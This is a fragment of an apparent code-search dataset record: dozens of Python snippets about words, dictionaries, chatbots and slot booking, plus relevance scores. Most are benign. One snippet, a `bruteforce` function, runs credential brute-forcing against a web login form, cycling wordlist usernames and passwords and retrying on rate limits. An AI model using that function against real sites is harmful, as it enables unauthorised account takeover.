used_words,\n 'isSafe': safepass(password)\n })", "def learn_new_word(word: str) -> None:\n\n if word is None:\n # Cannot learn known words\n return\n\n unlearned: bool = True\n\n while unlearned:\n # Ask about the word until it has been learned - its part of speech must be identified\n line = input(\"What is \" + word + \"?\")\n # Collect a dictionary of the valid Part names for comparison to input\n valid_names = names()\n\n # Split line by spaces to create a list of words\n line = line.split(' ')\n\n for arg in line:\n # Check all words in the input line for valid parts of speech\n if valid_names.__contains__(arg):\n acc.add_word(word, valid_names[arg])\n try_ask_save()\n return", "def visit_slot(self, slot_name: str, slot: SlotDefinition) -> None:\n sn = underscore(slot_name)\n self.emit('slot', sn)\n if slot.domain:\n self.emit('domain', sn, underscore(slot.domain))\n if slot.range:\n self.emit('range', sn, underscore(slot.range))\n for p in slot.mixins:\n self.emit('mixin', sn, underscore(p))\n if slot.is_a:\n is_a = underscore(slot.is_a)\n\n #uri = self.owlgen._prop_uri(slot.name)\n uri = f'http://w3id.org/biolink/vocab/{sn}'\n self.emit('has_uri', sn, uri)\n if slot.multivalued:\n self.emit('multivalued', sn)\n if slot.required:\n self.emit('required', sn)", "def handle_book_slot(time=None, name='default'):\n # Make request here\n print('in book slot')\n if not time:\n return question('You didn\\'t specify the time. Try again.')\n else:\n slot_date = session.attributes.get('date', None)\n params = {\n 'starttime': time,\n 'bookedbyuser': name,\n 'date': slot_date\n }\n print(params)\n session.attributes['stage'] = 'book_slot'\n session.attributes['slot_params'] = params\n return question('You want to book at ' + time + ' Is that correct?')", "def main():\n secret_word = get_word()\n print(secret_word)\n play_game(secret_word)", "async def ur(self, ctx: discord.ext.commands.Context, *args):\n print(\"-------------------------\")\n message_channel: discord.abc.Messageable = ctx.message.channel\n if len(args) == 1 or len(args) == 2:\n request_link = \"http://api.urbandictionary.com/v0/define?term=\" + str(args[0])\n async with aiohttp.ClientSession() as session:\n async with session.get(request_link) as resp: # the website use get\n request_result = await resp.json()\n if len(request_result[\"list\"]) == 0: # no results found\n print(\"No results for that word in urban dictionary\")\n await message_channel.send(\"*No results found for \\\"\" + str(\n args[0]) + \"\\\" in urban dictionary*\")\n else:\n # Store all definitions in an array\n definitions_found = []\n for definition in request_result[\"list\"]: # choose the best result with positive-percentage\n div = definition[\"thumbs_up\"] + definition[\"thumbs_down\"]\n if div == 0:\n percentage = 0\n else:\n percentage = (definition[\"thumbs_up\"] / div) * 100\n percentage = percentage * (definition[\"thumbs_up\"] + definition[\"thumbs_down\"])\n definitions_found.append(\n self.UrbanDefinition(definition['author'], definition['example'], definition['definition'],\n percentage)\n )\n # Sort the definition using votes\n definitions_found.sort(key=lambda UrbanDefinition: UrbanDefinition.votes, reverse=True)\n # create the embed to send\n if len(args) == 2 and args[1].isdigit():\n number_of_results = int(args[1])\n else:\n number_of_results = 1\n embed = discord.Embed(title=\"Urban Dictionary - Link\",\n url=\"https://www.urbandictionary.com/define.php?term=\" +\n urllib.parse.quote(str(args[0])),\n color=0x1d2439,\n description=\"Best \" + str(\n number_of_results) + \" urban dictionary results for \\\"\" + str(args[0]) + \"\\\"\")\n embed.set_author(name=\"Search required by \" + ctx.message.author.name,\n icon_url=ctx.message.author.avatar_url)\n embed.set_thumbnail(\n url='https://cdn.discordapp.com/attachments/276674976210485248/350641481872179200/featured-image4.jpg')\n # Calculate number of results to display and start creating the embed fields\n for x in range(0, min(len(definitions_found), number_of_results)):\n # Check text and prepare embed\n definition_text = definitions_found[x].definition\n if len(definition_text) > 1024: # cut the string, is too long\n definition_text = definition_text[:1000] + \"[TEXT TOO LONG]...\"\n embed.add_field(name=(\"Definition (From \" + str(definitions_found[x].author) + \"):\"),\n value=definition_text, inline=False)\n example_text = definitions_found[x].example\n if len(example_text) > 1024: # cut the string, is too long\n example_text = example_text[:1000] + \"[TEXT TOO LONG]...\"\n elif len(example_text) < 5:\n example_text = \"Example not available...\"\n embed.add_field(name=\"Example(s):\", value=example_text, inline=False)\n embed.add_field(name=\"---------------------------------------------\",\n value=\"---------------------------------------------\", inline=False)\n # End for, add footer and send the embed\n embed.set_footer(text=\"Using http://www.urbandictionary.com/\")\n try:\n await message_channel.send(embed=embed)\n print(\"Ur embed sent successfully\")\n except discord.errors.HTTPException:\n print(\"HTTPException during the sending of ur embed\")\n await message_channel.send(\"*An error occurred sending the result...*\")\n else:\n await message_channel.send(\n \"**Usage:** \" + self.command_prefix + \"ur word, for more see \" + self.command_prefix + \"help ur\")\n print(\"-------------------------\")", "def parse(self, text):\n\n goal = NLUGoal()\n goal.text = str(text)\n self._nlu_client.send_goal_and_wait(goal)\n result = self._nlu_client.get_result()\n\n #no intent found, return None \n if result.intentName == \"\":\n return None, None, None\n else:\n #parse\n slot_info = json.loads(result.slot_json_string)\n return result.intentName, result.probability, slot_info", "def replace_word(self):\n wordlist_path = self.get_wordlist_path()\n with open(wordlist_path) as f:\n data = json.load(f)\n\n for index, exist_word in data[\"words\"].items():\n if self.word == exist_word:\n new_word = input(\"New word:\\n\")\n if not check_word_format(new_word):\n exit()\n if exists_already(data,new_word):\n exit()\n # write new_word in\n data[\"words\"][index] = new_word\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1]))\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n print(f\"[{self.word}] has been replaced by [{new_word}]!\")\n return\n\n print(f\"[{self.word}] does not exist in list!\")", "def is_valid_word(word, hand, word_list):\n failure=True\n word=word.lower()\n if word not in word_list:\n failure=False\n for i in word:\n w=hand.get(i,0)\n if w==0:\n failure=False\n break\n return failure", "def handle_find_slot(date=None):\n if not date:\n session.attributes['stage'] = 'book_slot'\n return question('You didn\\'t specify the date. What date you would like to book?')\n else:\n print(date)\n params = {\n 'date': date\n }\n req = requests.get(config.API + '/find_slot', params=params)\n print(req.text)\n freeslots_string = get_time_strings(json.loads(req.text)['freesloats'])\n session.attributes['stage'] = 'find_slot'\n session.attributes['date'] = date\n return question(\n 'The free slots for ' + date + ' are ' + freeslots_string + ' Which one do you want me to book?')", "def validate(self, context):\n _logger.info(\"SpellDictionary EN validated\")\n self.dictionary = {\"hello\" , \"world\", \"welcome\", \"to\", \"the\", \"ipopo\", \"tutorial\"}", "def createWord(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "async def urban(self, interaction: Interaction, args: str):\n baseurl = \"https://www.urbandictionary.com/define.php?term=\"\n output = args\n await interaction.response.send_message(baseurl + output)", "def parse(self, word):\n raise NotImplementedError", "def run(request):\n print(\"This is the run() method\")\n \n #load str\n payload = json.loads(request)\n \n return f\"/n Returning the input for testing: {payload}\"", "def createQWord(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def check_word(self, word):\n word = word.lower().strip()\n return not word or word in self.dictionary", "def word_finder(request):\n correction = \" \"\n error = \" \"\n alist = [\"NONE\"]\n if request.method == \"GET\":\n spell_checker(request)\n\n return render(request, \"blog/word_finder.html\", {'correction' : correction, 'error': error, 'args': alist})", "def _add_user(self):\n args = {}\n args[\"name\"] = False\n #Loop until valid name given\n while not args[\"name\"]: #While name not set\n args[\"name\"] = input(\"Please enter the username of the user you would like to add: \").lower()\n args[\"userID\"] = self._get_user_id(args[\"name\"])\n if not args[\"userID\"]:\n args[\"name\"] = False\n #Get more input\n args[\"webhook_url\"] = input(\"Please enter the Discord WebHook URL for this user: \")\n args[\"override\"] = None\n #Loop until override info completed\n while args[\"override\"] == None:\n userInput = input(\"Override authentication user? y/n: \")\n if userInput.lower() == \"y\":\n args[\"override\"] = True\n args[\"overrideUser\"] = False\n #Loop until valid user given\n while not args[\"overrideUser\"]:\n args[\"overrideUser\"] = input(\"Please enter the Twitch username that you would like to authenticate with: \").lower()\n args[\"overrideUserID\"] = self._get_user_id(args[\"overrideUser\"])\n if not args[\"overrideUserID\"]:\n args[\"overrideUser\"] = False\n #Get oauth input, removing 'oauth:' from beginning\n args[\"overrideOauth\"] = input(\"Please enter the oauth token for the Twitch account, omitting 'oauth:': \")\n if args[\"overrideOauth\"].startswith(\"oauth:\"): #If the oauth token starts with oauth:, remove it\n args[\"overrideOauth\"] = args[\"overrideOauth\"][6:]\n elif userInput.lower() == \"n\":\n args[\"override\"] = False\n else:\n print(\"That is not a valid input.\")\n args[\"blacklist\"] = input(\"Please enter a space separated list of users to blacklist: \")\n return(args)", "def bruteforce(request, url, host, port, agent, \n user_key, pass_key, action_val, words):\n # successful credentials\n success = []\n success_users = set()\n\n # Add all transformations for each word\n all_words = set(words)\n transformations = transform.generate_transformations(list(words))\n for word in words:\n transformation = transformations[word]\n all_words.add(transformation.lower)\n all_words.add(transformation.upper)\n all_words.add(transformation.reverse)\n all_words.add(transformation.leet)\n \n # Try all combinations for the form described by url on host\n content_type = HTTP_CONTENTTYPE_FORMENCODED\n sleep_time = HTTP_RETRY_TIME\n for user in all_words:\n for _pass in all_words:\n data = {user_key: user, pass_key: _pass, 'action': action_val}\n body = HttpRequest.generate_post_body(content_type,data)\n content_length = len(body)\n too_many_req = 0\n while too_many_req < HTTP_TOO_MANY_REQ:\n response = request.send_post_request(url, host, \n agent, content_type,\n content_length, body)\n if response is None:\n too_many_req += 1\n print(f\" unable to contact {host}{url}. retrying in {HTTP_RETRY_TIME} seconds.\")\n time.sleep(HTTP_RETRY_TIME)\n continue\n # print(f'User: {user}, Pass: {_pass}')\n \n # See if the response contained any words that indicate a successful login.\n if verify_success_resp(tokenize_html(response.response,True)):\n # print(f' SUCCESS.')\n if user.lower() not in success_users:\n success.append(Credential(user.lower(),_pass))\n success_users.add(user.lower())\n break\n \n # Check the status code.\n status_tuple = response.status_code\n if status_tuple is not None:\n status_code, __ = status_tuple\n # print(f' FAIL. {status_code}')\n if status_code == \"429\" or status_code == \"503\":\n time.sleep(sleep_time)\n print(f\" {host}{url} was busy. retrying in {HTTP_RETRY_TIME} seconds.\")\n too_many_req += 1\n else:\n break\n if too_many_req >= HTTP_TOO_MANY_REQ:\n return success\n return success", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def hello_word():\n return {\"hello\": \"world\"}", "def test_input_text_returned_in_response_data(self):\n user_name = \"Ron Obvious\"\n user_input = \"Hello!\"\n\n data = self.chatbot.get_response_data(user_name, user_input)\n\n self.assertIn(user_input, data[\"user\"].keys())", "def guess_word(self, request):\n return games_ctrl.guess_word(request.urlsafe_game_key,\n request.word_guess)", "def main_completer_handler(self, text, state):\r\n response = None\r\n all_equals = []\r\n value = False\r\n equals = []\r\n\r\n # Build match list on first iteration else continue\r\n if state == 0:\r\n origline = readline.get_line_buffer()\r\n begin = readline.get_begidx()\r\n end = readline.get_endidx()\r\n being_completed = origline[begin:end]\r\n words = origline.split()\r\n\r\n if not words:\r\n # option for words list\r\n self.current_candidates = sorted(self.options.keys())\r\n else:\r\n # traverse all words entries and passing accordingly\r\n try:\r\n if begin == 0:\r\n # first word\r\n candidates = list(self.options.keys())\r\n else:\r\n # later word\r\n if '=' in words[len(words)-1] and len(words) > 1:\r\n #use possible values as candidates\r\n value = True\r\n equals = words[len(words)-1].split('=')\r\n if equals[1]:\r\n all_equals = [i.split('=') for i in words if '=' in i]\r\n\r\n if len(all_equals) > 1 and not all_equals[-2]\\\r\n [0] == all_equals[-1][0]and self.val_pos > 1:\r\n #reset candidates if new item\r\n candidates = []\r\n else:\r\n candidates = self.options[\"val\"]\r\n else:\r\n #use properties as candidates\r\n first = words[0]\r\n candidates = self.options[first]\r\n else:\r\n #use command items as candidates\r\n first = words[0]\r\n candidates = self.options[first]\r\n self.possible_vals = []\r\n if being_completed or equals:\r\n #possible value being_completed\r\n if equals:\r\n if equals[1] and not equals[1] in candidates:\r\n #match value\r\n being_completed = equals[1]\r\n else:\r\n #match property\r\n being_completed = equals[0]\r\n # match options with portion of input being completed\r\n self.current_candidates = [w for w in candidates\\\r\n if w and w.lower().startswith(being_completed.lower())]\r\n\r\n # return possible vals\r\n self.possible_vals = []\r\n if len(self.current_candidates) == 1 and 'set' in words[0] or equals:\r\n # second tab, return vals\r\n if being_completed == self.current_candidates[0]:\r\n #grab possible values\r\n for item in self.options['infovals']:\r\n if being_completed == item:\r\n val = self.options['infovals'][item]\r\n try:\r\n if 'Enumeration' in val['Type']:\r\n self.possible_vals = \\\r\n [v['ValueName'] for v in val['Value']]\r\n except:\r\n if 'boolean' in val['type']:\r\n self.possible_vals = [w for w in ['True', 'False']]\r\n elif 'string' in val['type']:\r\n self.possible_vals = [w for w \\\r\n in val['enum'] if w is not None]\r\n\r\n if self.possible_vals and 'null' \\\r\n in val['type']:\r\n self.possible_vals.append('None')\r\n break\r\n if self.possible_vals:\r\n self.options[\"val\"] = self.possible_vals\r\n self.val_pos = 0\r\n # first tab, complete\r\n else:\r\n self.possible_vals.append(self.current_candidates[0])\r\n self.val_pos += 1\r\n else:\r\n # matching empty string so use all candidates\r\n self.current_candidates = candidates\r\n\r\n except (KeyError, IndexError):\r\n self.current_candidates = []\r\n\r\n # Return the state from the match list if found otherwise return None.\r\n try:\r\n if self.possible_vals:\r\n response = self.possible_vals[state]\r\n else:\r\n response = self.current_candidates[state]\r\n except:\r\n # No candidate found for state\r\n response = None\r\n\r\n # Response return\r\n return response", "def add_word(self):\n word = self.word # easier to call word now\n\n wordlist_path = self.get_wordlist_path()\n with open(wordlist_path) as f:\n data = json.load(f)\n\n if exists_already(data,word):\n exit()\n\n next_index = int(data[\"cur_index\"]) + 1 # new index\n data[\"words\"][next_index] = word # update wordlist\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1])) # alphabetisize\n data[\"cur_index\"] = next_index # update index\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n\n print(f\"[{word}] added to [{self.pos}]. This is the [{next_index}] indexed word added.\")", "async def suggest(self, ctx, choice=None):\n\n if choice is None or choice.lower() in (\"online\", \"voice\"):\n suggestions = get_suggestions(get_users(ctx, choice))\n\n if suggestions:\n await self.bot.say(\"You can play these games: \\n\")\n message = pagify(\"\\n\".join(suggestions), ['\\n'])\n\n for page in message:\n await self.bot.say(box(page))\n else:\n await self.bot.say(\"You have exactly **zero** games in common, go buy a 4-pack!\")\n else:\n await self.bot.say(\"Please enter a valid filter -> either use `online` (default) for all online users or `voice` for all users in a voice channel\")", "def show_message_placed_word(self, word, value, player_name):\n\n interface_width = self.interface.GAME_WINDOW_WIDTH;\n interface_height = self.interface.GAME_WINDOW_HEIGHT;\n\n if(value != 0):\n title_text = \"Le joueur \" + player_name + \" a posé le mot \" + word;\n subtitle_text = \"Il remporte \" + str(value) + \" points !\";\n else:\n title_text = \"Le joueur \" + player_name + \" a posé le mot \" + word;\n subtitle_text = \"Ce mot n'est pas valable, il ne remporte aucun point\";\n\n self.message_placed_word.set_text_title(title_text);\n self.message_placed_word.set_text_subtitle(subtitle_text);\n self.message_placed_word.set_horizontal_alignment(Alignment.Center);\n self.message_placed_word.set_text_title_size(40);\n self.message_placed_word.set_text_subtitle_size(32);\n self.message_placed_word.set_space_between_titles(20);\n self.message_placed_word.set_color_title((0, 0, 0));\n self.message_placed_word.set_color_subtitle((0, 0, 0));\n self.message_placed_word.set_border_color((0, 0, 0));\n self.message_placed_word.set_border_thickness(4);\n\n self.message_placed_word.set_pos((interface_width/2, 200));\n\n self.message_placed_word.show(3);", "def callDatamuse(word, left_context=None):\n global dict_call_counter\n dict_call_counter += 1\n if not left_context:\n lc_text = \"\"\n else:\n lc_text = \"&lc=\" + re.sub(r'[-\"—.–,;:!?()]', '', left_context[:])\n clean_word = re.sub(r'[-\"—.–,;:!?()]', '', word)\n output = requests.get(\"https://api.datamuse.com/words?sp={}{}&md=f\".format(clean_word, lc_text))\n output_list = output.json()\n if len(output_list) != 0:\n matched_words = [i[\"word\"] for i in output_list]\n if clean_word.lower() not in matched_words: # takes into account when datamuse returns a number of words or a different 'related' word\n score = 0\n freq = 0\n else:\n score = output_list[matched_words.index(clean_word.lower())][\"score\"]\n freq = float(output_list[matched_words.index(clean_word.lower())][\"tags\"][0][2:])\n else:\n score = 0\n freq = 0\n final_score = score * math.sqrt(freq) # changed from (score + freq) / 2\n return final_score", "async def createCustomAutocompleteRule(self, body=\"\"):\n payload = {}\n \n\n # Parameter validation\n schema = CatalogValidator.createCustomAutocompleteRule()\n schema.dump(schema.load(payload))\n \n # Body validation\n from .models import CreateAutocompleteKeyword\n schema = CreateAutocompleteKeyword()\n schema.dump(schema.load(body))\n \n\n url_with_params = await create_url_with_params(self._conf.domain, f\"/service/platform/catalog/v1.0/company/{self._conf.companyId}/application/{self.applicationId}/search/autocomplete/\", \"\"\"{\"required\":[{\"in\":\"path\",\"name\":\"company_id\",\"description\":\"A `company_id` is a unique identifier for a particular seller account.\",\"schema\":{\"type\":\"string\"},\"required\":true},{\"in\":\"path\",\"name\":\"application_id\",\"description\":\"A `application_id` is a unique identifier for a particular sale channel.\",\"schema\":{\"type\":\"string\"},\"required\":true}],\"optional\":[],\"query\":[],\"headers\":[],\"path\":[{\"in\":\"path\",\"name\":\"company_id\",\"description\":\"A `company_id` is a unique identifier for a particular seller account.\",\"schema\":{\"type\":\"string\"},\"required\":true},{\"in\":\"path\",\"name\":\"application_id\",\"description\":\"A `application_id` is a unique identifier for a particular sale channel.\",\"schema\":{\"type\":\"string\"},\"required\":true}]}\"\"\", )\n query_string = await create_query_string()\n headers = {\n \"Authorization\": \"Bearer \" + await self._conf.getAccessToken()\n }\n for h in self._conf.extraHeaders:\n headers.update(h)\n exclude_headers = []\n for key, val in headers.items():\n if not key.startswith(\"x-fp-\"):\n exclude_headers.append(key)\n return await AiohttpHelper().aiohttp_request(\"POST\", url_with_params, headers=get_headers_with_signature(self._conf.domain, \"post\", await create_url_without_domain(f\"/service/platform/catalog/v1.0/company/{self._conf.companyId}/application/{self.applicationId}/search/autocomplete/\", ), query_string, headers, body, exclude_headers=exclude_headers), data=body)", "def search_keywords(search_term, must_not_term, state, search_type):\n print(\"search_type is \", search_type)\n\n # Search types are freeform and stringmatch\n\n if search_type == \"freeform\":\n print(\"Freeform Search\")\n print(search_term)\n print(\"search_keywords must not\",must_not_term)\n if search_term == \"\" or search_term is None:\n return json.dumps([])\n else:\n # pandas_index_list = elastic_dash.test_search(search_term, must_not_term)\n pandas_index_list = elastic_dash.test_search_standard(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_desc2(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_fivegrams(search_term, must_not_term)\n return json.dumps(pandas_index_list)\n else:\n print(\"Perfect Search\")\n print(search_term)\n print(\"search_keywords must not\", must_not_term)\n if search_term == \"\" or search_term is None:\n return json.dumps([])\n else:\n # pandas_index_list = elastic_dash.test_search(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_standard(search_term, must_not_term)\n pandas_index_list = elastic_dash.test_search_standard_perfect(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_desc2(search_term, must_not_term)\n # pandas_index_list = elastic_dash.test_search_fivegrams(search_term, must_not_term)\n return json.dumps(pandas_index_list)", "def get_next_word(self, user_word, computer_word):\n pass", "def test_api_score_word(self):\n\n with self.client as client:\n response = client.get('/api/new-game')\n response_json = response.get_json()\n game_id = response_json[\"gameId\"]\n game = games[game_id]\n game.board[0] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[1] = [\"D\", \"O\",\"G\",\"A\",\"A\"]\n game.board[2] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[3] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n game.board[4] = [\"A\", \"A\",\"A\",\"A\",\"A\"]\n\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"AAAA\"})\n self.assertEqual(response.get_json(), {\"result\":\"not-word\"})\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"dog\"})\n self.assertEqual(response.get_json(), {\"result\": \"ok\"})\n response = client.post('/api/score-word', json={\"gameId\":game_id, \"word\": \"CAT\"})\n self.assertEqual(response.get_json(), {\"result\":\"not-on-board\"})\n\n #inside of the games dictionary, there is a instance of BoggleGame with a board and a game_id\n # we can manualy change the board to include a word and test for test for that word." ]
[ "0.61216205", "0.58270305", "0.58179843", "0.57400197", "0.5649318", "0.5606277", "0.5591704", "0.5455674", "0.5431328", "0.5341701", "0.5329532", "0.52859133", "0.5281709", "0.52787936", "0.52630574", "0.51918024", "0.51817644", "0.5147042", "0.51228225", "0.5112976", "0.51122284", "0.5095223", "0.5091525", "0.5090254", "0.5044046", "0.5017014", "0.50117487", "0.5011184", "0.4999181", "0.49991223", "0.4987326", "0.49838778", "0.49663842", "0.4917687", "0.49067453", "0.49021393", "0.48968187", "0.48946068", "0.48938242", "0.48912147", "0.4886642", "0.48744503", "0.4862664", "0.48553824", "0.48349336", "0.48332134", "0.48286998", "0.48133755", "0.48097754", "0.48063526", "0.48013753", "0.47964182", "0.4790247", "0.47866145", "0.4774536", "0.47606844", "0.47557363", "0.47465742", "0.4741017", "0.47237816", "0.47233644", "0.4721692", "0.4708166", "0.47038886", "0.46940017", "0.46917894", "0.46794337", "0.46711656", "0.46573037", "0.46564916", "0.46467987", "0.4644585", "0.4642203", "0.46385154", "0.46379754", "0.46207488", "0.4619342", "0.46181148", "0.46179625", "0.46167383", "0.46068305", "0.46012977", "0.45959637", "0.45948938", "0.4594324", "0.45936787", "0.45805424", "0.45766434", "0.4575204", "0.45751065", "0.45742786", "0.4572058", "0.4552983", "0.45527774", "0.4551432", "0.45480776", "0.454537", "0.45452186", "0.4537977", "0.45353317" ]
0.6205886
0
This function handles the example sentence intent
def my_word_example_handler(handler_input): # type: (HandlerInput) -> Response slots = handler_input.request_envelope.request.intent.slots if example_slot in slots: curr_word = slots[example_slot].value handler_input.attributes_manager.session_attributes[ example_slot_key] = curr_word try: response = http_get(curr_word, False) if response: example = response[0]['def'][0]['sseq'][0][0][1]['dt'][1][0] if example == "vis": vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][1][1][0]['t']) speech = ("An example with {} (part of speech {}) " "is: {}".format(curr_word, response[0]['fl'], vis)) elif example == "wsgram": vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][2][1][0]['t']) speech = ("An example with {} (part of speech {}) " "is: {}".format(curr_word, response[0]['fl'], vis)) else: speech = ("No example is available for {}").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = ("No example is available for {}").format(curr_word) reprompt = ("What word would you like me to look up?") except Exception as e: speech = ("No example is available for {}. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = "I'm not sure what word to look up, please try again" reprompt = ("I didn't catch that. What word would you like me " "me to look up?") handler_input.attributes_manager.session_attributes[previous_key] = speech handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_sentence(self):", "def onCurrentSentence(self, *_args):\n global instance\n log(str(_args))\n #if (instance.isSpeaking and len(_args[1])==0): instance.SpeakDone()\n return", "def hook(self, sentence, words):\n pass", "def handle_gui_example_three_intent(self, message):\n self.gui['sampleText'] = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Egestas sed tempus urna et pharetra pharetra massa massa ultricies. Aliquam sem et tortor consequat id porta nibh. Amet est placerat in egestas erat imperdiet sed. Ut ornare lectus sit amet est placerat in egestas erat. Iaculis eu non diam phasellus vestibulum lorem sed risus ultricies. Hac habitasse platea dictumst vestibulum rhoncus est pellentesque. Vulputate eu scelerisque felis imperdiet proin fermentum. Neque convallis a cras semper auctor neque. Pharetra magna ac placerat vestibulum lectus mauris ultrices eros in. Phasellus faucibus scelerisque eleifend donec pretium vulputate. Malesuada bibendum arcu vitae elementum curabitur vitae nunc. Tellus id interdum velit laoreet id donec. Diam donec adipiscing tristique risus nec. Nisi lacus sed viverra tellus in hac habitasse platea. Amet venenatis urna cursus eget nunc scelerisque viverra mauris in. Sit amet nisl suscipit adipiscing bibendum est ultricies. Nec ultrices dui sapien eget mi proin sed. Egestas dui id ornare arcu odio ut sem nulla. Rhoncus aenean vel elit scelerisque. Neque gravida in fermentum et sollicitudin. Pellentesque massa placerat duis ultricies lacus sed. Nunc id cursus metus aliquam eleifend mi. Eu feugiat pretium nibh ipsum consequat nisl. Aenean euismod elementum nisi quis eleifend quam adipiscing vitae. Est ante in nibh mauris cursus mattis. Sagittis eu volutpat odio facilisis mauris sit amet. At consectetur lorem donec massa sapien faucibus. Odio facilisis mauris sit amet. Quis ipsum suspendisse ultrices gravida dictum fusce. Sagittis nisl rhoncus mattis rhoncus urna neque viverra justo nec. Eget mi proin sed libero enim sed faucibus. Interdum velit euismod in pellentesque massa. Et netus et malesuada fames. Velit aliquet sagittis id consectetur purus. Condimentum lacinia quis vel eros donec ac odio tempor orci. Amet consectetur adipiscing elit pellentesque habitant. Eleifend mi in nulla posuere sollicitudin aliquam ultrices sagittis orci. Nisi porta lorem mollis aliquam ut porttitor leo a diam. Egestas integer eget aliquet nibh praesent tristique. Velit scelerisque in dictum non. Id volutpat lacus laoreet non curabitur gravida arcu ac. Suspendisse interdum consectetur libero id faucibus nisl tincidunt eget. Ipsum a arcu cursus vitae congue mauris. Duis at consectetur lorem donec massa. Orci sagittis eu volutpat odio facilisis mauris. Eget mauris pharetra et ultrices neque ornare. Commodo nulla facilisi nullam vehicula ipsum a. Arcu risus quis varius quam quisque. Gravida in fermentum et sollicitudin. Lacus laoreet non curabitur gravida arcu ac tortor dignissim. Netus et malesuada fames ac turpis. Ipsum dolor sit amet consectetur adipiscing. Tellus elementum sagittis vitae et leo duis ut diam quam. Vitae et leo duis ut diam quam nulla. Risus pretium quam vulputate dignissim. Justo laoreet sit amet cursus sit amet dictum sit. Blandit libero volutpat sed cras. Lacus sed viverra tellus in. Ornare lectus sit amet est placerat in egestas erat. Tortor dignissim convallis aenean et tortor at. Tempus quam pellentesque nec nam aliquam. Nisi scelerisque eu ultrices vitae auctor eu augue ut lectus. Consequat id porta nibh venenatis cras sed felis eget. Massa enim nec dui nunc mattis enim ut. Dignissim enim sit amet venenatis urna. Ac tincidunt vitae semper quis lectus nulla at. Sed felis eget velit aliquet sagittis. Vel turpis nunc eget lorem dolor sed viverra. Non consectetur a erat nam at lectus. Iaculis eu non diam phasellus vestibulum. Dolor sit amet consectetur adipiscing elit ut aliquam purus sit. Libero justo laoreet sit amet cursus sit. Tellus pellentesque eu tincidunt tortor. Maecenas volutpat blandit aliquam etiam erat velit scelerisque in. Semper risus in 